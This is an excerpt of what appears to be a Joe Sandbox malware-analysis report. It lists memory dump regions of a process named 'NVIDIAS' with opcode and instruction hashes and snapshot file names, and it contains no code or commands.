                                                                        • Opcode Fuzzy Hash: 04fb962ec80115b0686e29cb03f70063e2f9739a180ec97222136d1e55f450ea
                                                                        • Instruction Fuzzy Hash: 2351E271D003489BDB14CFDAC884BDEBBB5BF88710F14852AE509BB254DB74A94ACF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e55c37069e9b311a85be94f72654253e970ee75b80570817cc01392cc8327fa
                                                                        • Instruction ID: 3fb7f81f5ca4e4fac27ae0a804e74cab0d4c34b1dc1465a7ec6a15b529f4947a
                                                                        • Opcode Fuzzy Hash: 9e55c37069e9b311a85be94f72654253e970ee75b80570817cc01392cc8327fa
                                                                        • Instruction Fuzzy Hash: C4414874A00705CFCB19CFA8C8D4AADBBB2EF98314B154169E805AF761DB75DC46CB40
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 612a32ff7d3813d9674eb7cc3236a98317787f3bee25c564275c860b199b528e
                                                                        • Instruction ID: 792dbb09f83387eb9e8fc455f0dadcbd56a1bb12e643edc933fd051c32044d93
                                                                        • Opcode Fuzzy Hash: 612a32ff7d3813d9674eb7cc3236a98317787f3bee25c564275c860b199b528e
                                                                        • Instruction Fuzzy Hash: 71418276F101289BCB08CF9CE89099DB7B2FB88350B15852AE819F7351DA35AC468B80
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 63f76bd39f38b6c942a3eea4c08ebfb6ee0e674a1282d58c45dcc8e73df2a53f
                                                                        • Instruction ID: e97ed2202cc9387499e92027dfef6f725b1884f88ed0cd90e8dfdf92d05bdc39
                                                                        • Opcode Fuzzy Hash: 63f76bd39f38b6c942a3eea4c08ebfb6ee0e674a1282d58c45dcc8e73df2a53f
                                                                        • Instruction Fuzzy Hash: 444151752002459FEB05DF68C850BAE7BA2FF85314F14C569E84A9B3A2CB36EC56CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 294ed644f9b107c830305738b50eca141e6fb73570f74074e01278b705b1ff48
                                                                        • Instruction ID: 9735f35418ecaef0adcad4038338d408fb8123b67872d8cad04aa635549d3473
                                                                        • Opcode Fuzzy Hash: 294ed644f9b107c830305738b50eca141e6fb73570f74074e01278b705b1ff48
                                                                        • Instruction Fuzzy Hash: F041A072A10115AFCF059FA5C944D9DBFB7FF8C32071580A9E2099B221DB32EC21DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 76fde93f946a75ff79430469968ecedf914a9daed20baa43cea7a476f9dbaa81
                                                                        • Instruction ID: 0cea4d27015f2313e12ec510dc8afc11fcd1c7e470d7e3bee7e6ebdcc32c492b
                                                                        • Opcode Fuzzy Hash: 76fde93f946a75ff79430469968ecedf914a9daed20baa43cea7a476f9dbaa81
                                                                        • Instruction Fuzzy Hash: 47314867F0D7848FD73A4A2C58202796BB27F82110F2945EBC041CF65BC765CC46C356
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec29bb579b63d18872dbcc2a494542ae6224d9927a862323e4cd1ccb8005adde
                                                                        • Instruction ID: 459c7388fc2f5a0e051f55795e17191a48e8ec8ebf0a08cbe47c0a674893f9ae
                                                                        • Opcode Fuzzy Hash: ec29bb579b63d18872dbcc2a494542ae6224d9927a862323e4cd1ccb8005adde
                                                                        • Instruction Fuzzy Hash: 40416276F111189BCB04CF9DE89099DB7B2FB88310F158529E819FB351EA35AC46CB84
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 931a02ed930ef139e7dbba2a25a5bb4ed00facb690ad193ae52b39076440b609
                                                                        • Instruction ID: 1723f81daf3bc70f75be7bf7b65811f6400c5de802c2c7a10be630540216166e
                                                                        • Opcode Fuzzy Hash: 931a02ed930ef139e7dbba2a25a5bb4ed00facb690ad193ae52b39076440b609
                                                                        • Instruction Fuzzy Hash: 39318E72A10115AFCF099FA5C944D9DBBB7FF8C310B1580A9E2099B231DB72EC21DB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8eeec78c631c6b48096b8944f11510ce7eb718fe385e40515e83282eba50068a
                                                                        • Instruction ID: d8dde24cfdf64cc4e78b4c9b60a804b4c7520082f26fbf78fa1cbed1e20bad69
                                                                        • Opcode Fuzzy Hash: 8eeec78c631c6b48096b8944f11510ce7eb718fe385e40515e83282eba50068a
                                                                        • Instruction Fuzzy Hash: 743152225083E55FE746EFBCD8A13DD7FB1AF82519F0800A7C4C4DB292E624CA45D756
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bbab91cfa6f37bb97e7f467828acc8a2c3fce0a22b5c0fd0fed37f0c851a4829
                                                                        • Instruction ID: 4fcc7da9ce247ce19a336e4e333ac7bdb41fab8ef4cfaf2c753b8c210a0e1a2f
                                                                        • Opcode Fuzzy Hash: bbab91cfa6f37bb97e7f467828acc8a2c3fce0a22b5c0fd0fed37f0c851a4829
                                                                        • Instruction Fuzzy Hash: E831AF36F006248FCB14DF6DD8959AEB7F6EFC822071A41A9E909EB361DA20DD04C790
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a41d1d0c88f4a7bfe6e4fa1e153dec39a990553cfa623329ccfeba38fe12e8c3
                                                                        • Instruction ID: 1aa2d409d16a70d7bd3db3a04d5241c296a2ef1dd5efb70748fe71633879ab82
                                                                        • Opcode Fuzzy Hash: a41d1d0c88f4a7bfe6e4fa1e153dec39a990553cfa623329ccfeba38fe12e8c3
                                                                        • Instruction Fuzzy Hash: BC318F35A002009FDB04CB68C955B69B7F2FBC9344F19C4AAD809EB351CB36ED46CB90
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4e7a11590656a0b05474a1ae82a6f31e56f5f5632012140872ba0f44082cac36
                                                                        • Instruction ID: 029bfa5db25c85b5972465a79d8b9fa4026c1cbb90e519826c64065f98f4c63a
                                                                        • Opcode Fuzzy Hash: 4e7a11590656a0b05474a1ae82a6f31e56f5f5632012140872ba0f44082cac36
                                                                        • Instruction Fuzzy Hash: 6431DF79A04255AFC705CB59D86096AFBF9FF8931071485AAD808CB742C731EC42CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a3bdcd7029e5c0bacd77db834b95df6935c292bbbf02ad12807e902d79b15666
                                                                        • Instruction ID: f0684318b7409faf7fa911c33be12d17a41b9707699952c8dfeef84935f4c100
                                                                        • Opcode Fuzzy Hash: a3bdcd7029e5c0bacd77db834b95df6935c292bbbf02ad12807e902d79b15666
                                                                        • Instruction Fuzzy Hash: A631D0B1B002455FDB48CAAEC88199EBBE7FBC8220754C529D40DDB304EB70DD0A8B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9723f23fbbff10284e0ec219b430728bfece886d0a83ecc23d3a697e4d328207
                                                                        • Instruction ID: b2fda60f5912dddf47c5516a95a8a4f08ebb83e749dfeda9ce706a1702c499cb
                                                                        • Opcode Fuzzy Hash: 9723f23fbbff10284e0ec219b430728bfece886d0a83ecc23d3a697e4d328207
                                                                        • Instruction Fuzzy Hash: 5E31F5326043A04FCB06DB6CEC905ADBBE6EFC662070989AFD409CF255DB669C05C792
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6205da246d2d21c455252181c1bd3917245a1ff7c7ce80fcae8d2ca70bba9f2
                                                                        • Instruction ID: 1a469251063e5e21ce0663e6a322ee33841181e78fd1707dc11738b4406b4ad1
                                                                        • Opcode Fuzzy Hash: b6205da246d2d21c455252181c1bd3917245a1ff7c7ce80fcae8d2ca70bba9f2
                                                                        • Instruction Fuzzy Hash: 1D31B132B001258BC704CA6DD894A6AF7A7BFC4314759896AD90DDB342EB35EC46CBC4
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a64b9ac5502cedfcc988ec390e5bbe0dd74cce8579723d6a7c38f35f54585c1c
                                                                        • Instruction ID: 85b0cb9a0bba31d64f677d8e3c25e3b256d69ef2eebc96c8a643f4727dfa6a9a
                                                                        • Opcode Fuzzy Hash: a64b9ac5502cedfcc988ec390e5bbe0dd74cce8579723d6a7c38f35f54585c1c
                                                                        • Instruction Fuzzy Hash: D941F3B0D00349DFDB14DFA9C884ADEBBB5FF48314F14842AE819AB254DB75A945CF90
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 234d2436a2070c4888bb422beba9b5ecf4080754386434d2ad984b01400d9dfa
                                                                        • Instruction ID: ecab467a8062b6d87b1c4895b3228b05ca7fd21371417f338ed7c2b074305d97
                                                                        • Opcode Fuzzy Hash: 234d2436a2070c4888bb422beba9b5ecf4080754386434d2ad984b01400d9dfa
                                                                        • Instruction Fuzzy Hash: BE319CB1B002455F9B48DAAEC89559EBBE7EBC8260B15C529D40DDB304EB70DD0A8B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1216165903.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_55a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7c6706f95dce051c4bfe9c9e610c73f8dc75488e7f97dff16f467c8bbfd037a7
                                                                        • Instruction ID: 63ddf9ec601b13cb239157e00e79cf21bf4dd5adece08a7d9bcbd8ddc46d9aff
                                                                        • Opcode Fuzzy Hash: 7c6706f95dce051c4bfe9c9e610c73f8dc75488e7f97dff16f467c8bbfd037a7
                                                                        • Instruction Fuzzy Hash: 3F21067BB0A3454BDB3D4629683627D6BA37FC6520F1884BBC405CF34ADE31C8469791
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1dddd3f90e3cd1dc493d81656ddf8ee642989f38e29ebc45d24148fa0d8e7d2c
                                                                        • Instruction ID: bc191041db7cf648b08b61071654e6dc077aaa69aa9ceefae5de350811fb9bde
                                                                        • Opcode Fuzzy Hash: 1dddd3f90e3cd1dc493d81656ddf8ee642989f38e29ebc45d24148fa0d8e7d2c
                                                                        • Instruction Fuzzy Hash: D841D2B0D00349DFDB10DF99C884ADEBBB5FF48314F24842AE819AB254DB759945CF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 44803eabc5d71a9d2312b235f4a0fdb16fff2399392760720edbe6b52a4172b0
                                                                        • Instruction ID: 1b137a6ac8bf330bddc8b4c28928ab042f8e0ed94f92ebedb408c5aa6319fa1b
                                                                        • Opcode Fuzzy Hash: 44803eabc5d71a9d2312b235f4a0fdb16fff2399392760720edbe6b52a4172b0
                                                                        • Instruction Fuzzy Hash: 75312770D002499FDB10DFEAD490BEEBFF5AF48350F24852AE509A7290DB359945CFA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b18a51653d4365e4ff216808a2964b0f9d2e126da80d9e50e113af92fdad225c
                                                                        • Instruction ID: 997591feeebe8e86d7b02fdf6dca9a1f7f3bde22ec550b019ca2105f302e68da
                                                                        • Opcode Fuzzy Hash: b18a51653d4365e4ff216808a2964b0f9d2e126da80d9e50e113af92fdad225c
                                                                        • Instruction Fuzzy Hash: 0711BC5710D3F01BF642EBADF8B17DA7B65AF83929F1900D7C0CCCA192E515C48686AB
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1cd2db5e463fdf057f4bd0e63f7148e2f5e4cc188b7857ec6baed968bd83227b
                                                                        • Instruction ID: 39772db663b5d69c85c333ca6f6ccb63af4826856c56cb873d4065ed2bd01a08
                                                                        • Opcode Fuzzy Hash: 1cd2db5e463fdf057f4bd0e63f7148e2f5e4cc188b7857ec6baed968bd83227b
                                                                        • Instruction Fuzzy Hash: D831E072D017299FCB25DF7CC8806AEBBB6FF49200785056AD901BB280D7399C41CBD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fd2b4a1b3c3cae71ebda0e201b0d7022399f351981585c5a7832b524a6b2dfd4
                                                                        • Instruction ID: 85ddd1f4c37e89dd4b2ff9db85e2152b0a64315c1f55266c5a018379eaede08c
                                                                        • Opcode Fuzzy Hash: fd2b4a1b3c3cae71ebda0e201b0d7022399f351981585c5a7832b524a6b2dfd4
                                                                        • Instruction Fuzzy Hash: 08218E71A492918FDB06CF79CC944497FF1AF8B21030A84EBD844DF262C6359D16CBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3f5e825c4df2d94a23d14e5bdf3a2e064924bd913ec5b6d64680cf3fbb8cfd74
                                                                        • Instruction ID: a865e5ad6531cc2b30d50fb1b6f4e1061e0fc283b5596dc0ee9e8c17ebc32753
                                                                        • Opcode Fuzzy Hash: 3f5e825c4df2d94a23d14e5bdf3a2e064924bd913ec5b6d64680cf3fbb8cfd74
                                                                        • Instruction Fuzzy Hash: 0621C436A019109FC314DF2CD994999FBA6FFC1222359C5E5E808AF755D736EC42CB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 85f7a9146ebdecf3b885c6ac9a1888d3076380f1b9f84f590a4c07860e8b1883
                                                                        • Instruction ID: 18be0c49802725c8cb3fb100e6aa46cb345a593845b04e75b2b4e1bad1b1f98c
                                                                        • Opcode Fuzzy Hash: 85f7a9146ebdecf3b885c6ac9a1888d3076380f1b9f84f590a4c07860e8b1883
                                                                        • Instruction Fuzzy Hash: C921BC76D017299FCB24DFBCD8806AEBBB6FB48200B850129D911BB380D7399C81CBD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1210700842.0000000001A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A3D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_1a3d000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9619c813b96cce19fdecf7bc20c60f4888859e9876d30fb3d39343d8711e145a
                                                                        • Instruction ID: ba3508d968c918af0cf8c975d5b03f4b150196f2911b7c096cbe35385e0dd901
                                                                        • Opcode Fuzzy Hash: 9619c813b96cce19fdecf7bc20c60f4888859e9876d30fb3d39343d8711e145a
                                                                        • Instruction Fuzzy Hash: 472104B5604340EFDB01DF98D8C0B26BB65FBC4724F64C96DE8094B246C776D856CB61
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1210700842.0000000001A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A3D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_1a3d000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 87ba7cdc2d06b4e021a37a561bc1f75ff3ac6645da029e7362291462f2e0ec88
                                                                        • Instruction ID: 33785bafc0382954fe67caeb9fc2a26050e4945edc1349e59ebe0d77ed04ba44
                                                                        • Opcode Fuzzy Hash: 87ba7cdc2d06b4e021a37a561bc1f75ff3ac6645da029e7362291462f2e0ec88
                                                                        • Instruction Fuzzy Hash: 4921D171604340EFDB11DF58D8C4B2AFB65FBC5B74F64C569E84A0B242C37AD846CAA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e7b0af541c6f959b78c117dee6c5c8cef13c57feb21412ffbbfa1706184a30d
                                                                        • Instruction ID: 93afd6773ce19eb47fe59dc5771e3bf467fc5a9439f994a2464394298990ece8
                                                                        • Opcode Fuzzy Hash: 9e7b0af541c6f959b78c117dee6c5c8cef13c57feb21412ffbbfa1706184a30d
                                                                        • Instruction Fuzzy Hash: C0213D31B00144DFDB14CF58D558AA9BBF3EB88214F58806AD809EB391DB76DC46CB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 175643e5194e24371b1b57ce6eb922c9ed97cf089ee9cec5f4b45f183f447fbf
                                                                        • Instruction ID: 05494893ebf2a1c511f8e22615aa46dff93eee7d499bf2cc54d2e72e67a12acb
                                                                        • Opcode Fuzzy Hash: 175643e5194e24371b1b57ce6eb922c9ed97cf089ee9cec5f4b45f183f447fbf
                                                                        • Instruction Fuzzy Hash: 53219AB5B002018FCB44DA6CD95166FF7F6FF84254B24896A880ADB341EE30DD868BC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 27d300cd3a69a2dcf2a49d052d35ebd235f0fa1c9eae03a55f942b175ce2be30
                                                                        • Instruction ID: 8d6d7b9106f92db6e858aeee1098a7aa80acb4c0da4898b9e8a55c7a949219c6
                                                                        • Opcode Fuzzy Hash: 27d300cd3a69a2dcf2a49d052d35ebd235f0fa1c9eae03a55f942b175ce2be30
                                                                        • Instruction Fuzzy Hash: 6121F4359083648FD7158B68DC64AA5BFB5EF46211F0980EFD409EB392DB304D89CF91
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9fe5fd1d7921859e5f7f93cf53878c98a8855232269bcbb7e928d8b99c05b54e
                                                                        • Instruction ID: 13f42b1ea666c2ba1d434805c4bdc8dbbb63610345aaeefb946ec214be29ed64
                                                                        • Opcode Fuzzy Hash: 9fe5fd1d7921859e5f7f93cf53878c98a8855232269bcbb7e928d8b99c05b54e
                                                                        • Instruction Fuzzy Hash: D2211779A406198FDB24CFA9DC81B9DBBB1BF48300F558099E909BB351D770AE89CF40
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 95690458ef857fe9a1103ae234f1a600f0a19a533c94a6a5e1cf89211826741c
                                                                        • Instruction ID: 3dd9ecbc7db7a1119336c2254589ddc611ef80ca9b69c035ff0d50b15b946efb
                                                                        • Opcode Fuzzy Hash: 95690458ef857fe9a1103ae234f1a600f0a19a533c94a6a5e1cf89211826741c
                                                                        • Instruction Fuzzy Hash: CB217970B002118FDB44DAADC9516AFF7F6FBC4650B14896A9809DB341EA74DD868BD0
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da240734a08bef760e7817c1d10e7baea54735c01af26f67fa9d3b3dffce6693
                                                                        • Instruction ID: 4c39938181b6164c42b64a4f06c4df3dd3584d645acb33c4b5664f666ee98fb7
                                                                        • Opcode Fuzzy Hash: da240734a08bef760e7817c1d10e7baea54735c01af26f67fa9d3b3dffce6693
                                                                        • Instruction Fuzzy Hash: 36115637B007209FD719DA3DA880569F7A7EFC622171A81AAD809AB751CA35AC02C7D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ad386b0e1ae5489cfea4f7e32b5b15e8933a4e38b39a843576b4665ca11db4a7
                                                                        • Instruction ID: 6574071cdabf6bd71d635c7540a8f598a3d6855efcf262efd26f0a7105b03988
                                                                        • Opcode Fuzzy Hash: ad386b0e1ae5489cfea4f7e32b5b15e8933a4e38b39a843576b4665ca11db4a7
                                                                        • Instruction Fuzzy Hash: 8D1129317087804FDB198EAE4C9492ABBFAAFC655430E01FEE505CF3A2DA50CC098B51
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e5b9ebbce3b34372919fce7fd792108642c6e57ff2e4a832fd4792615ea23784
                                                                        • Instruction ID: a2683233bbe94872c04f390ade5a82084b9b3acea85afef0c60f41468f872b76
                                                                        • Opcode Fuzzy Hash: e5b9ebbce3b34372919fce7fd792108642c6e57ff2e4a832fd4792615ea23784
                                                                        • Instruction Fuzzy Hash: 6F11BE75F016048FCB54EFB8D9908AEBBB2FF8531071945A9C809AF355CB369C06CBA0
                                                                        Memory Dump Source
